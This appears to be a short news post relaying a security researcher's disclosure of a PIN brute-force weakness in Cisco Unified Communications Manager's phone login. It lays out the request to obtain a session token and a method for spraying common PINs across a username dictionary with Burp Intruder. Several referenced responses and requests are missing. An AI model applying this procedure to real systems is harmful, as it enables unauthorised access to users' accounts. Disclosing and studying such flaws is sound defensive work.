By the founder of OWASP (Open Web Application Security Project) New Zealand, named Roberto Suggi Liverani a Vulnerability in Cisco Call Manager has been founded which is AKA Unified communications manager and it is a software based call processing system developed by the Cisco Systems.
Here is the Founder’s step by step Vulnerability defined by him
A simple HTTP GET request is performed by the handset to initiate the login sequence with a request as the one below:
1) GET – https://x.x.x.x/ccmpd/pdCheckLogin.do?name=undefined
The response contains a reference to the login.do page along with a “sid” token, which is used in the subsequent requests, as shown in the response below:
The sid token is required to perform the PIN brute force attack.
Also, the response provides some clues on which parameters to include in the login request, such as userID and PIN. The following GET request can then be used to perform a PIN brute force account.
At this stage, it is possible to perform a PIN brute force attack, as a valid SID token needs to be passed when authenticating the user.
In case the userid/PIN are wrong, the following response is returned:
It seems not possible to perform userID enumeration. In such case, it is recommended to have a large username dictionary file and then try against the same PIN (e.g. common value 1234, 12345). This can be easily done using the Burp intruder tab, as shown below:
If the correct userID/PIN are found, the response will contain links for each service, as shown below:
The above sequence of requests can be trivially automated with a web proxy, such as Burp, by setting a macro for instance.
If a valid userID/PIN is found, it is recommended to stop the brute force attack, generate a new sid token and then restart the brute force attack.
